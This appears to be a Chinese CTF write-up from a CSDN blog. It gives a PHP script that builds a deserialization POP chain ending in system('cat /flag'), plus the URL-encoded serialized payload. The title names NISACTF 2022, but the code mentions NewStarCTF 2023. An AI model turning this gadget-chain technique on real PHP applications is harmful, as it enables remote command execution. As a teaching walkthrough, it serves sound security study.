构造pop链编写脚本
[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)-CSDN博客
<?php
class Begin{
public $name;//6 Then
public function __destruct()
{
if(preg_match("/[a-zA-Z0-9]/",$this->name)){
echo "Hello";
}else{
echo "Welcome to NewStarCTF 2023!";
}
}
}
class Then{
public $func;//5 Super,并且改为公共属性
public function __toString()
{
($this->func)();
return "Good Job!";
}
}
class Handle{
public $obj;//3 CTF,并且改为公共属性
public function __call($func, $vars)
{
$this->obj->end();
}
}
class Super{
public $obj;//4 Handle,并且改为公共属性
public function __invoke()
{
$this->obj->getStr();
}
public function end()
{
die("==GAME OVER==");
}
}
class CTF{
public $handle;//2 WhiteGod
public function end()
{
unset($this->handle->log);
}
}
class WhiteGod{
public $func;//1
public $var;//1
public function __unset($var)
{
($this->func)($this->var);
}
}
$w = new WhiteGod();
$w->func = 'system';
$w->var = 'cat /flag';
$c = new CTF();
$c->handle = $w;
$h = new Handle();
$h->obj = $c;
$s = new Super();
$s->obj = $h;
$t = new Then();
$t->func = $s;
$b = new Begin();
$b->name = $t;
echo urlencode(serialize($b));
?>payload:
pop=O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22var%22%3Bs%3A9%3A%22cat%20%2Fflag%22%3B%7D%7D%7D%7D%7D%7D注意要把空格url编码后的“+”改为%20
或者本题可以不用url编码,直接echo serialize($b);
